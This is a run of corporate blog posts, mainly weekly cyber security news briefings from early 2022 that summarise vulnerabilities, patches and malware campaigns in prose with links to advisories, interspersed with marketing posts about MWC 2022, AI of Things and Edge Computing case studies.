Cyber Security Weekly Briefing 12-18 March
Vishing by impersonating Microsoft
The Office of Internet Security (OSI) has issued a security advisory to report an increase, in recent weeks, in fraudulent calls in which a supposed Microsoft employee claims that the user's device is infected. In this type of fraud, known as vishing, the attacker urges the victim to install a remote access application that will supposedly disinfect the device. Once the cybercriminal has gained access to the user's computer, they can steal all kinds of files stored on the device, get hold of the passwords stored in the browser and even install malware that locks the computer and then demands payment to unlock it. If the user has answered the call and installed the programme mentioned by the cybercriminal, the OSI recommends disconnecting the device from the network, uninstalling the programme and running an antivirus.
More info: https://www.osi.es/es/actualidad/avisos/2022/03/vuelven-las-llamadas-fraudulentas-del-supuesto-soporte-tecnico-de

Linux kernel Netfilter vulnerability
Security researcher Nick Gregory has discovered a new vulnerability in the Linux kernel. The flaw, identified as CVE-2022-25636 with a CVSSv3 of 7.8, is an out-of-bounds write in Netfilter, the Linux kernel framework that provides network operations such as packet filtering, network address and port translation (NAPT), connection tracking and other packet manipulation. A local attacker could exploit this vulnerability to escalate privileges and execute arbitrary code on the vulnerable system. It should be noted that the flaw affects Linux kernel versions 5.4 to 5.6.10, so upgrading to the new version as soon as possible is recommended, since a PoC is available.
More info: https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/

Brazilian trojan variant Maxtrilha targets Portuguese users
Researcher Pedro Tavares of Segurança Informática has detected a possible new variant of the Brazilian trojan known as Maxtrilha. This variant is being distributed via phishing templates impersonating the Portuguese tax services (Autoridade Tributária e Aduaneira) and targets banking users in Portugal. Researchers consider this malware to be a new variant of Maxtrilha because of the similarity of the samples and because it uses the same templates to attack users. The malicious emails contain a URL that downloads an HTML file called "Dividas 2021.html" or "Financas.htm", which then downloads a ZIP file and ultimately the malware. This new variant can install or modify trusted Windows certificates, perform a banking window overlay to steal credentials and deploy additional payloads executed via the DLL injection technique.
More info: https://seguranca-informatica.pt/brazilian-trojan-impacting-portuguese-users-and-using-the-same-capabilities-seen-in-other-latin-american-threats/

Apple fixes 87 vulnerabilities
Apple has published 10 security bulletins that fix a total of 87 vulnerabilities in its different products and platforms: iOS 15.4 and iPadOS 15.4, watchOS 8.5, tvOS 15.4, macOS Monterey 12.3, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, Xcode 13.3, Logic Pro X 10.7.3, GarageBand 10.4.6 and iTunes 12.12.3 for Windows. The vulnerabilities include flaws in WebKit (the web browser engine used by Safari, Mail and the App Store) that could lead to remote code execution (CVE-2022-22610, CVE-2022-22624, CVE-2022-22628 and CVE-2022-22629). There are also four other vulnerabilities in document, audio and video viewing components on iPhone and iPad that could allow malware deployment or privilege escalation (CVE-2022-22633, CVE-2022-22634, CVE-2022-22635 and CVE-2022-22636). Finally, it is worth noting that macOS receives updates for both the current version and the two previous versions, but only the most current versions of iOS, watchOS, iPadOS and tvOS receive these updates.
More info: https://nakedsecurity.sophos.com/2022/03/15/apple-patches-87-security-holes-from-iphones-and-macs-to-windows/

LokiLocker: new RaaS with wiper functionality
BlackBerry's research team has identified a new Ransomware as a Service (RaaS) targeting computers running the Windows operating system. According to the experts, the malware was first seen in mid-August 2021 and has affected victims worldwide, although most of them are located in Europe and Asia. Among LokiLocker's most notable features are that it is written in .NET and protected with NETGuard, and that it uses KoiVM, a virtualisation plugin that is not commonly used and makes the malware difficult to analyse. In addition, LokiLocker sets a time limit for paying the ransom: if the victim does not give in to the blackmail, it runs a file-wiping function on the computer, sparing only system files, and overwrites the master boot record (MBR) of the system drive to render it unusable.
More info: https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware
March 18, 2022
Telefónica Tech
Telefónica Tech at Mobile World Congress 2022
MWC 2022 was undoubtedly one of the busiest in recent years. After the pandemic halt and the rescheduling of MWC 2021, and even though only six months had passed since the last edition, everyone there was really looking forward to meeting each other, talking about technology and having a coffee. In addition, this year Telefónica Tech brought to the physical stand in Barcelona and to the virtual stand in the Telefónica Metaverse a very complete proposal of all its digital transformation solutions for companies: IoT, Big Data, Blockchain, Cybersecurity and Cloud. Throughout the conference, visitors in Barcelona also focused on the face-to-face demos at the Telefónica stand, which was visited by more than 2,560 people. First of all, the Smart Industry demo, where visitors could discover the different use cases:
Automation: a key element that increases efficiency, reduces costs and, above all, allows operators to perform higher value-added tasks while technology performs the more repetitive ones.
Sustainability: through the application of IoT, Big Data, 5G, Cybersecurity, Blockchain and Cloud technology, it is possible to extend the useful life of resources and respond to energy anomalies, contributing to protecting the environment.
Remote assistance: through the robotic arm we saw how, thanks to the low latency provided by 5G and virtual reality, incidents can be handled remotely and in real time, allowing industries to reduce response times and minimise costs.
The Smart Buildings demo showed how smart buildings allow integrated, automated, more efficient, healthier and safer management and control for people. We also saw how, through our integration platform, we obtain a centralised view of the data we collect, analyse and process.
We brought all of this to the keynote sessions organised by the GSMA and to those held in the Agora at the Telefónica stand:
'Innovating across business; moving now to next', with Elena Gil Lizasoain taking part in a round table on the importance of diversity and inclusion as an essential commitment to enhancing the value of companies.
'Digital rights and SDGs: sustainable business facing the digital rights challenge'. Once again, Elena Gil Lizasoain defended companies' conviction about the need for digitalisation and the enormous role played by talent, especially people, in carrying out this transformation process. "Customers, employees and investors are increasingly demanding to work with companies that are sustainable."
'Kickstarting 5G for Manufacturing', with Andres Escribano Riesco talking about smart industry and how 5G and digital technologies are enabling us to develop real-world use cases.
March 14, 2022
Cyber Security
Cyber Security Weekly Briefing 5-11 March
Mozilla patches two 0-day vulnerabilities
Mozilla has issued a security advisory patching two 0-day vulnerabilities that are reportedly being actively exploited and affect Firefox, Focus and Thunderbird. Both vulnerabilities were reported by the 360 ATA security team. The first one, classified as CVE-2022-26485, is a use-after-free vulnerability in XSLT parameter processing, the component used for document conversion. The second one, classified as CVE-2022-26486, is a use-after-free vulnerability in the WebGPU IPC framework. If exploited, a threat actor could execute code remotely, bypassing security controls, and could even compromise the device by downloading malicious code. Both vulnerabilities are fixed in Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0 and Focus 97.3.0. Mozilla recommends updating as soon as possible.
Discover more: https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/#CVE-2022-26485

Dirty Pipe: new vulnerability in the Linux kernel
Security researcher Max Kellermann has published details of a new vulnerability in the Linux kernel from version 5.8 onwards that would allow local users to gain root privileges through exploits that are already publicly available. Identified as CVE-2022-0847 and with a CVSSv3 of 7.8, the bug would allow an unprivileged local user to inject and overwrite arbitrary data in read-only files, including the binaries of SUID processes running as root, leading to privilege escalation on the affected system and even making it possible to manipulate sensitive files such as /etc/passwd, which would allow the root user's password to be removed. In his publication, the researcher shares a proof of concept (PoC) and points out the similarity of this vulnerability to "Dirty Cow" (CVE-2016-5195), which came to light in October 2016, although on this occasion its exploitation would be less complex, and groups such as Anonymous have already spoken out about it. The vulnerability has already been fixed in Linux versions 5.16.11, 5.15.25 and 5.10.102, so it is recommended to patch as soon as possible given its potential impact if successfully exploited.
All the details: https://dirtypipe.cm4all.com/

Microsoft update bulletin
Microsoft has published its security bulletin for the month of March, in which it reports the correction of a total of 74 flaws, including three vulnerabilities rated critical by the firm and three 0-days that are reportedly not being actively exploited.
Critical vulnerabilities according to Microsoft: The most critical of the three flaws (CVE-2022-23277, CVSSv3 8.8) affects Microsoft Exchange Server and allows an authenticated attacker to target server accounts with the goal of executing remote code with ADMIN privileges, due to a flaw in memory management by the server. The other two flaws also classified as critical by Microsoft, CVE-2022-22006 and CVE-2022-24501, both with CVSSv3 7.8, affect the HEVC and VP9 video extensions, but their exploitation requires social engineering, as the victim must download and open a specially crafted file.
0-days: The most serious flaw of this type, CVE-2022-21990 (CVSSv3 8.8), allows remote code execution in RDP. Some researchers point out that this flaw should be considered critical and stress that, although it is not actively exploited yet, it may be exploited soon since a proof of concept is already available. The other two 0-day fixes are identified as CVE-2022-23285 (CVSSv3 8.8) and CVE-2022-24503 (CVSSv3 5.4).
More: https://msrc.microsoft.com/update-guide/releaseNote/2022-Mar

UEFI firmware vulnerabilities
HP, in conjunction with the Binarly team, has discovered multiple high-impact vulnerabilities in UEFI firmware, which reportedly affect different HP products such as laptops and desktops, edge nodes and point-of-sale (PoS) systems. These have been classified as CVE-2021-39298 with CVSSv3 8.8, and CVE-2021-39297, CVE-2021-39299, CVE-2021-39300 and CVE-2021-39301, all with CVSSv3 of 7.5. When exploited, a threat actor could inject malicious code, escalate privileges, and persist on devices across operating system updates. HP has provided firmware updates and instructions on how to update the BIOS.
All the information: https://support.hp.com/us-en/document/ish_5661066-5661090-16

Analysis of the resurgence of Emotet
Researchers at Black Lotus Labs have published an analysis of evidence of the resurgence of the Emotet botnet since November 2021. The researchers indicate that since then, the botnet has shown a sharp increase in activity through approximately 130,000 unique bots spread across 179 countries, accumulating more than 1.6 million infected devices. The malware resurfaced using TrickBot as a delivery method, and although its Command & Control (C2) structure was reportedly reinstated in November, the addition of bots was not announced until January. The technical details of the report reveal that Emotet has made notable changes to its operation, such as the algorithm used to encrypt network traffic, which is now based on elliptic curve cryptography (ECC), or the change in the tiering model, marked by the absence of Bot C2, although it is not known whether this is a temporary or permanent change. As Emotet is distributed via compromised emails with malicious attachments, the researchers recommend intensifying anti-phishing preventive measures and monitoring network resources to prevent possible downstream incidents.
More info: https://blog.lumen.com/emotet-redux/
March 11, 2022
Telefónica Tech
Telefónica Tech AI of Things made real
In a previous post on our blog, we already told you how the combination of technologies based on Artificial Intelligence, IoT and Big Data, the "Artificial Intelligence of Things", helps us to have a safer, more efficient, more sustainable and more human life.

AI of Things, the Artificial Intelligence of Things
What is the real meaning of Artificial Intelligence of Things? It may look like something new, but once we get to know its meaning, we realize that it is already present in our daily lives. And it is not a fleeting thing; it is here to stay.

Discover the full potential of AI of Things on the new website
The new AI of Things website is the perfect place to learn about our wide portfolio of solutions for mobility management, industry 5.0, smart spaces, companies looking for energy monitoring and management, or advertising solutions. In addition, our capabilities in connectivity, professional services in strategic consulting and advanced analytics and training, AI & Business Insights platforms and technological enablers such as Blockchain allow us to offer all the potential derived from the union of IoT, Big Data, Artificial Intelligence and Blockchain technologies. This union allows us to accompany organisations in all types of industries in their digital transformation. Thanks to our sectoral value proposition, designed for more than 12 sectors and resolved in 140 use cases, we help transform organisations in sectors such as mobility, transport, tourism, logistics and distribution, utilities and many others. All this is reflected in the extensive gallery of success stories of customers who have already relied on the solutions and capabilities that we offer from Telefónica Tech AI of Things, and that show how solutions based on IoT, Big Data, Artificial Intelligence and Blockchain technologies are already a reality in society.

We have unified our social media channels
We have unified our social media channels to offer you clearer, more accessible and more accurate information. If you don't want to miss any of our posts, video posts, webinars, infographics, events, live events, etc., take note of our new channels.
Twitter: All our news in English: https://twitter.com/TefTechAIoT_EN (English account).
LinkedIn: https://www.linkedin.com/company/telefonica-tech-aiofthings
Blog: Our articles in English: https://business.blogthinkbig.com/telefonica-tech-aiofthings
YouTube: https://www.youtube.com/c/telefonicatechaiofthings
We look forward to seeing you on all our social channels!
-AI of Things. Join the magic-
March 9, 2022
Cyber Security
Cyber Security Weekly Briefing 28 February - 4 March
Daxin: highly sophisticated backdoor
Researchers at Symantec have published a paper reporting a new backdoor they have called Daxin, which they attribute to actors linked to China. According to Symantec, it is the most advanced malware they have seen from Chinese threat actors. Daxin can read and write files and start processes, but is particularly notable for its stealth and the way it communicates with its Command & Control. The malware is able to hijack legitimate TCP/IP connections in order to perform a key exchange with its remote peer, thus opening an encrypted communication channel to receive commands and send responses while hiding among legitimate traffic and bypassing security solutions. Another notable capability is its ability to create a new communication channel across multiple infected computers on the same network using a single command for a set of nodes. This allows it to quickly re-establish connections and encrypted communication channels. Symantec has identified Daxin in government organisations, as well as in entities in the telecommunications, transportation and industrial sectors that are of strategic interest to China. The attacks observed date back to November 2021, but the researchers note that the oldest sample identified dates back to 2013.
More info: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage

Critical vulnerability in GitLab
GitLab has released a security update that fixes a total of 7 vulnerabilities affecting GitLab Community Edition (CE) and Enterprise Edition (EE). Among the security flaws, the most notable is the one identified as CVE-2022-0735, which has a CVSS score of 9.6. Exploitation of this vulnerability could allow an unauthenticated attacker to obtain a runner registration token, enabling remote code execution. Although the technical details of the vulnerability have not been published, its exploitation would be of low complexity and would require neither privileges nor user interaction. This vulnerability affects all versions from 12.10 to 14.6.4, from 14.7 to 14.7.3, and from 14.8 to 14.8.1. As a result, GitLab has recommended upgrading to versions 14.8.2, 14.7.4 and 14.6.5 of GitLab Community Edition (CE) and Enterprise Edition (EE).
All the details: https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/

Distribution of TeaBot via the Google Play store
Researchers at Cleafy have published a new article on the TeaBot banking trojan, also known as Anatsa, which has reportedly started to be distributed via rogue apps hosted on the Google Play store. This banking trojan emerged in early 2021 and was primarily distributed via smishing campaigns. The new samples, however, have switched to using Google Play as a means of distribution, with a TeaBot dropper hiding behind a QR code scanner app (QR Code & Barcode - Scanner). Once the app is installed, the dropper prompts the user to update it via a pop-up message. This supposed update is not actually an update: instead, a second application ('QR Code Scanner: Add-On') is downloaded from an untrusted source. This second application is the one already identified as TeaBot, which asks the user to grant it accessibility service permissions, giving it privileges such as viewing and controlling the screen and observing and performing actions. Recent TeaBot campaigns have added support for languages such as Russian, Slovak and Mandarin Chinese, so the malware could be expanding its targets geographically.
More: https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe
March 4, 2022
Cyber Security
Cyber Security Weekly Briefing 19-25 February
New privilege escalation flaw in Linux
Security researchers at Qualys have discovered seven flaws in Canonical's Snap software packaging and deployment system, used in operating systems based on the Linux kernel. The most severe of these vulnerabilities, listed as CVE-2021-44731 and reportedly receiving a CVSSv3 of 7.8, is a privilege escalation flaw in the snap-confine program, used internally by the snapd tool to build the execution environment for snap applications. Successful exploitation could allow any unprivileged user to gain root privileges on the vulnerable host. The flaw was communicated to vendors and open-source distributions as soon as it was discovered last October, leading to a coordinated patch release on 17 February. Qualys researchers have also developed an exploit for this issue that allows full root privileges to be obtained on default Ubuntu installations. The other six vulnerabilities identified are: CVE-2021-3995, CVE-2021-3996, CVE-2021-3997, CVE-2021-3998, CVE-2021-3999 and CVE-2021-44730.
All the details: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731

Conti ransomware operators take over TrickBot operations
Researchers at Advanced Intelligence have published a report indicating that the TrickBot malware has transferred its management to the Conti ransomware operators. AdvIntel's experts have analysed the background of TrickBot, noting its historically close relationship with the ransomware and its subsequent rise to prominence. Conti has relied, among other factors, on maintaining a code of conduct among its operators, which has allowed it to thrive and remain active while other ransomware groups have been dismantled by various law enforcement operations. Experts suggest that TrickBot gradually became a subsidiary of Conti's operators, as they were the only ones still using it in their operations. Also, by the end of 2021, Conti had absorbed multiple TrickBot developers and operators. However, it is worth noting that since TrickBot's network traffic is reportedly easy to detect, Conti operators have begun to replace it with the BazarBackDoor malware, which is under their own development and is used to gain initial access to their victims' networks.
More: https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works

Cobalt Strike distributed on vulnerable MS-SQL servers
Analysts at ASEC have discovered a new campaign in which vulnerable Microsoft SQL (MS-SQL) servers exposed to the internet are being attacked by malicious actors with the goal of deploying Cobalt Strike on compromised hosts. The attacks targeting MS-SQL servers include attacks on environments where vulnerabilities have not been patched, as well as brute-force and dictionary attacks against mismanaged servers. First, the malicious actor scans port 1433 to check whether MS-SQL servers are open to the public, and then carries out brute-force or dictionary attacks against the administrator account to try to log in. Different malware families such as Lemon Duck scan this port and propagate through it in order to move laterally within the internal network. The attacks culminate in the decryption of the Cobalt Strike executable, followed by its injection into the legitimate Microsoft Build Engine (MSBuild) process, which has been abused in the past by malicious actors to deploy remote access trojans and credential-stealing malware. Finally, it is worth noting that the version of Cobalt Strike running inside MSBuild.exe comes with additional settings to evade detection by security software.
All the details: https://asec.ahnlab.com/en/31811/
February 25, 2022
Cyber Security
Cyber Security Weekly Briefing 12-18 February
Researchers develop exploit for critical vulnerability in Magento
Positive Technologies' offensive security team has developed a proof of concept (PoC) for the CVE-2022-24086 (CVSSv3 9.8) vulnerability, claiming that it would allow control of the system to be gained with web server permissions. However, the researchers have stated that they do not intend to release this exploit either publicly or privately to other industry analysts. This critical vulnerability affecting Adobe Commerce and Magento Open Source was fixed by Adobe last Sunday in a security update. Exploiting this flaw would allow an unauthenticated attacker to execute arbitrary code remotely, although it is worth noting that, despite not requiring authentication, it can only be exploited by an attacker with administrator privileges. The flaw affects Magento Open Source and Adobe Commerce versions 2.4.3-p1 and 2.3.7-p2 and earlier, with the exception of Adobe Commerce versions prior to 2.3.3.3. Also yesterday, Adobe updated this security bulletin to add a new flaw, CVE-2022-24087, also of the Improper Input Validation type, which also has a CVSSv3 score of 9.8 and would allow an unauthenticated attacker to execute arbitrary code remotely. It is recommended to patch both critical vulnerabilities as soon as possible.
More info: https://helpx.adobe.com/security/products/magento/apsb22-12.html

0-day in Chrome being actively exploited
Google released fixes for eight security flaws in the Google Chrome browser on Monday, including a high-severity vulnerability that is being actively exploited. This use-after-free vulnerability resides in the Animation component, has been identified as CVE-2022-0609 and, if successfully exploited, would allow an attacker to execute arbitrary code remotely, as well as alter legitimate information. Google has also addressed four other high-severity use-after-free vulnerabilities affecting the File Manager, ANGLE, GPU and Webstore API, as well as a heap buffer overflow vulnerability in Tab Groups and an inappropriate implementation in the Gamepad API. Google recommends updating Google Chrome to version 98.0.4758.102 to fix these bugs.
Discover more: https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html

TA2541 campaign persistent over time
Researchers at Proofpoint have published a new paper attributing a long-running, persistent attack campaign to the TA2541 group. The campaign targets the aviation, aerospace, transportation, manufacturing and defence sectors in North America, Europe and the Middle East. The activity of this group dates back to 2017 and, since that year, they have used TTPs that have been maintained over time. The usual entry vector identified is an English-language phishing campaign using aviation, transport or travel-related subjects. They do not take advantage of current events as other groups often do, although they have also occasionally mixed their usual subjects with topical ones such as COVID-19. These emails include attachments that download the payloads of different RATs, mainly families that can be easily acquired on cybercrime forums, with AsyncRAT, NetWire and WSH RAT standing out above the rest. The group has recently refined its campaigns and is no longer sending payloads as attachments, but via links included in emails that point to cloud services.
All details: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

Classified US information exfiltrated by Russian actors
CISA has published a security advisory warning of a cyber espionage campaign dating back to at least January 2020. According to the warning, Russian threat actors have compromised and exfiltrated information from US-authorised defence contractors (CDC), private entities that are authorised to access highly sensitive information in order to bid for contracts, including information in the areas of intelligence, armaments, aircraft and information technology, among others. Among the techniques used as an entry vector, the attackers would have used spearphishing campaigns, credential harvesting, brute force techniques, password spraying or the exploitation of vulnerabilities. Once the companies had been compromised, the attackers managed to maintain persistence in some of them for at least six months, thus enabling Russia to obtain strategic information with which it could have established military priorities and strategic plans and accelerated software development.
More info: https://www.cisa.gov/uscert/ncas/alerts/aa22-047a
February 18, 2022
Cyber Security
Cyber Security Weekly Briefing 5 - 11 February
Microsoft disables macros and MSIX to prevent malware distribution
Microsoft has been actively mobilising against multiple malware attacks that use some of its technologies as an entry vector. The products affected in particular are the Office suite and the MSIX application installers that allow developers to distribute applications for different platforms. In the case of Office, the company will disable Visual Basic for Applications (VBA) macros by default in all its products, including Word, Excel, PowerPoint, Access and Visio, for documents downloaded from the web, although they can still be enabled voluntarily by the user. According to Microsoft's own publication, enabling macros in an Office file allows threat actors to deliver malicious payloads, deploy malware, compromise accounts, exfiltrate information and even gain remote access to targeted systems. The move comes just a month after the Windows vendor disabled Excel 4.0 (XLM) macros by default, another feature that is widely abused to distribute malware. Regarding MSIX application installers, Microsoft has announced that it will temporarily disable the MSIX ms-appinstaller protocol handler in Windows after evidence of active exploitation of vulnerability CVE-2021-43890, which allows the installation of unauthorised applications and is being used to deliver malware such as Emotet, TrickBot and BazaLoader. This move means that, until Microsoft fully fixes the bug, App Installer will not be able to install an app directly from a web server, so users must first download the app to their device and then install the package with App Installer.
More: https://docs.microsoft.com/es-es/DeployOffice/security/internet-macros-blocked

Possible exfiltration of information due to vulnerability in Argo CD
Researchers at Apiiro have disclosed a vulnerability in Argo CD, a widely used tool for deploying applications in Kubernetes, which could be exploited by attackers in order to obtain sensitive information from different organisations, especially passwords and API keys. The vulnerability has been catalogued with the identifier CVE-2022-24348 (CVSSv3 7.7) and consists of a path traversal flaw that could lead to privilege escalation, information disclosure and lateral movement. Exploitation is achieved by loading a specially crafted Kubernetes Helm Chart YAML file on the target system, as long as the attacker has permission to create and update applications and knows the full path to a file containing valid YAML. For its part, Argo CD released version 2.3.0-rc4 last Friday, just 5 days after Apiiro researchers alerted them to the bug.
All the details: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/

Critical vulnerabilities in SAP products
SAP has released its February security bulletin issuing 22 major updates, including fixes for the Log4j impact, as well as three critical memory corruption vulnerabilities affecting Internet Communication Manager (ICM), a core component of SAP's business applications. These last three flaws were discovered by SAP's product security response team in collaboration with Onapsis Research Labs, who have named them "ICMAD" (Internet Communication Manager Advanced Desync). The most critical vulnerability, already patched in SAP Security Note 3123396, is identified as CVE-2022-22536 and has a CVSSv3 of 10.0; it would allow an unauthenticated attacker to prepend a victim's request with arbitrary data and thereby execute functions impersonating the victim. The remaining two bugs have also been patched by SAP in its security note 3123427 and correspond to CVE-2022-22532 and CVE-2022-22533, with CVSSv3 of 8.0 and 7.5 respectively. Both of these would also be exploitable by an unauthenticated remote attacker, although they only affect SAP applications running on SAP NetWeaver AS Java. It should be noted that successful exploitation of these vulnerabilities could result in severe impacts such as theft of confidential information, ransomware and disruption of business processes and operations. SAP recommends applying SAP's February 2022 security updates as soon as possible, as well as making use of the open source tool provided by Onapsis that identifies whether a system is vulnerable and in need of patching.
Discover all: https://onapsis.com/blog/sap-security-patch-day-february-2022-severe-http-smuggling-vulnerabilities-sap-netweaver

Microsoft security updates
Microsoft has fixed a vulnerability in Microsoft Defender antivirus on Windows that allowed attackers to distribute and execute payloads unnoticed by the malware detection engine. The flaw is due to a loosely configured registry key containing the list of locations excluded from Microsoft Defender scanning, which was readable by all users. After remediation, it is visible only to users with administrator privileges. This security bug affected the latest versions of Windows 10 and would have been fixed with Microsoft's latest security updates in February. It is also worth noting that Microsoft is removing the Windows Management Instrumentation command-line tool (WMIC), wmic.exe, from the latest Windows 11 development builds, in favour of PowerShell. The removal only affects the command-line tool, so WMI itself is not affected. WMI has been widely abused by malicious actors and wmic.exe is even considered a LOLBin (living-off-the-land binary). By removing the WMIC utility, multiple attacks and malware will no longer function properly, as they will no longer be able to execute some of the commands necessary to carry out their operations, although it is possible that attackers will replace WMIC with new methods.
More info: https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-defender-flaw-letting-hackers-bypass-antivirus-scans/

Cybercriminals exploiting Windows Regsvr32 utility to distribute malware
Researchers at Uptycs have analysed a new campaign in which malicious actors are increasingly abusing a Windows LOLBin known as Regsvr32 to spread malware. LOLBins are legitimate, native utilities commonly used in computing environments that cybercriminals exploit to evade detection by blending in with normal activity patterns. In this case, Regsvr32 is a Microsoft-signed utility in Windows that allows users to manage code libraries and register DLL files by adding information to the central directory (registry) so that they can be used by Windows and shared between programs. According to Uptycs, the utility is being abused through a technique known as Squiblydoo, where Regsvr32 is used to execute DLLs via COM scriptlets without making any changes to the registry. The research adds that malicious use of this utility has been on the rise lately, mainly to register .OCX files hosted in various malicious Microsoft Office documents. Uptycs has analysed up to 500 malware samples that are reportedly being distributed this way, some of them belonging to Qbot and Lokibot.
All the details: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents
February 11, 2022
Cloud
Edge Computing, 3 case studies
2021 was a turning point for the arrival of Edge Computing in our lives. Newscasts, written press, social networks, chats among friends... This term did not escape from any of our spheres, because we all wanted to know what Edge Computing really was. Now that we know what it is, we wonder how, and through which projects, it is being implemented. What use cases are already demanding this technology? To find out, there is nothing better than learning about Telefónica Tech's case studies on this journey, which will conclude with the arrival of the "real" 5G, 5G SA (StandAlone), which will bring new capabilities.

Navantia
Navantia, a leading company in the manufacture of high-tech ships, has found in Telefónica the best travelling partner on the road to its digital transformation. In this project, 3 use cases of 5G Edge Computing applied to ship repair and construction processes have been defined:
5G and Edge Computing for remote assistance
5G and Edge Computing for real-time processing of 3D scanning
5G and Augmented Reality for shipbuilding
Find out all about this case study in the following video:

APM Terminals
APM Terminals, one of the largest operators in port, maritime and land terminal design worldwide, joins this list of Edge Computing case studies thanks to its pilot project with Telefónica. As its technology partner, Telefónica is developing a pilot project at APM Terminals' container terminal in the port of Barcelona to improve safety through a combination of 5G, Edge Computing and C-V2X technology. Here we find two case studies:
Geolocation and virtual positioning of fixed objects
Geolocation of moving elements
Learn more about this case study in the following video:

IE UNIVERSITY
Edge Computing has also reached classrooms, and the best example of this is the case study of IE University. Together with Telefónica and Nokia, this well-known educational centre has developed an immersive experience at its campus in Segovia, thanks to the application of 5G and Edge Computing. These are immersive virtual lessons in which students learn in streaming and from their own devices. In this use case, a third key element is added to 5G and Edge Computing: Virtual Reality. If you want to know how it is possible, and the role of each of these elements in making this pioneering experience a reality, press play:
February 10, 2022
Cyber Security
Cyber Security Weekly Briefing 22-28 January
New vulnerabilities in Linux
Two new vulnerabilities have recently been disclosed that reportedly affect Linux systems. If exploited, they could allow privilege escalation on the vulnerable system.
CVE-2021-4034 (PwnKit): Researchers at Qualys have discovered a memory corruption flaw in polkit's pkexec program that could allow a local attacker to escalate privileges on a vulnerable system and obtain root privileges. Hours after the disclosure of the Qualys article, the first proof-of-concept (PoC) was made public, which would allow this flaw to be exploited. Qualys recommends applying the available patches that the authors of Polkit have published on GitLab.
CVE-2022-0185: A buffer overflow vulnerability in the Linux kernel that could allow an attacker to escape from Kubernetes containers and take control of the node, with the CAP_SYS_ADMIN privilege enabled as a requirement. The researchers highlight that exploitation of this flaw is straightforward, so they recommend updating as soon as possible. Crusaders of Rust (CoR), the team that discovered the flaw, has revealed that they will publish the exploit code in the coming weeks on their GitHub repository.
More info: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

Let's Encrypt SSL/TLS certificates revoked due to implementation error
Let's Encrypt has announced in a statement that it will revoke certain SSL/TLS certificates on January 28th due to two irregularities in the implementation of a validation method. According to the statement, this will only affect certificates that were issued and validated using the TLS-ALPN-01 challenge before February 26th at 00:48 UTC, when the implementation error was corrected. They also indicate that this will affect less than 1% of certificates. Let's Encrypt will communicate to affected users the guidelines they will have to follow to renew their certificates. It should be noted that this is not the first time Let's Encrypt has faced a problem of this kind, as in October 2021 the DST Root CA X3 root certificate expired.
All the details: https://community.letsencrypt.org/t/2022-01-25-issue-with-tls-alpn-01-validation-method/170450

Espionage campaign using OneDrive as C2
Researchers at Trellix have published details of a multi-phase espionage campaign targeting high-ranking government officials and defence employees in West Asia. The campaign began in October, but the preparation of the infrastructure could date back as far as June. The entry vector would be an Excel document, possibly sent by email, which exploits a remote code execution vulnerability in MSHTML (CVE-2021-40444), fixed by Microsoft in its September update bulletin. This exploit allows the deployment of a malware known as Graphite, which uses the Microsoft Graph API in order to use OneDrive as a Command & Control server. Once the connection to the C2 is established, Empire, an open-source post-exploitation framework widely used for illicit purposes, is downloaded. Due to the multiple stages of the infection chain, which facilitate evasion, as well as the use of new techniques including OneDrive as C2 to ensure that all connections are made to legitimate Microsoft domains, we could say that we are dealing with a highly sophisticated campaign. Based on the targets, researchers point to a possible attribution to APT28 (aka Sofacy, Strontium, Fancy Bear or Sednit), of Russian origin.
All info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html

Apple fixes new 0-day exploit used to breach iOS devices
Apple has released new security updates for iOS 15.3 and iPadOS 15.3, as well as macOS Monterey 12.2, in which it has fixed two 0-day vulnerabilities. The first of the flaws, identified as CVE-2022-22587, is a memory corruption flaw in IOMobileFrameBuffer that affects iOS, iPadOS and macOS Monterey. Successful exploitation of this vulnerability could allow arbitrary code execution with kernel privileges on compromised devices. Apple highlights that the flaw is being actively exploited. The second 0-day, a flaw in Safari WebKit on iOS and iPadOS, would allow websites to track browsing activity and user identity in real time. This vulnerability, classified as CVE-2022-22594, was first discovered by Martin Bajanik of FingerprintJS on November 28th, but was only published on January 14th and fixed in this update.
Discover more: https://support.apple.com/en-us/HT213053

TrickBot strengthens protections to evade detection and analysis
IBM Trusteer researchers have analysed recent TrickBot malware campaigns, in which the operators behind the trojan have added additional layers of protection to their injections to avoid detection and analysis. These code injections are used in real time when a user with an infected device tries to access their bank account; the injections are designed to intercept and modify information leaving the browser before it reaches the bank's server. Most of the samples in which these new capabilities have been detected have been used in cases of bank fraud, one of TrickBot's main activities. The implemented updates include a new server-side injection mechanism, encrypted communications with the C2 (Command & Control), an anti-debugging feature and new ways to obfuscate and hide the injected code. On the other hand, security researchers have reported that the operators of Emotet, malware that first infects the device in order to distribute other malware such as TrickBot in a second phase, have also improved their evasion techniques by using hexadecimal and octal IP addresses, reportedly using the same web shell provider as TR does with Qakbot or Squirrelwaffle. They have identified up to 138 sites compromised by this malware.
All the details: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/
January 28, 2022
Cyber Security
Cyber Security Weekly Briefing 15–21 January
Cyber-attack campaign against Ukrainian targets
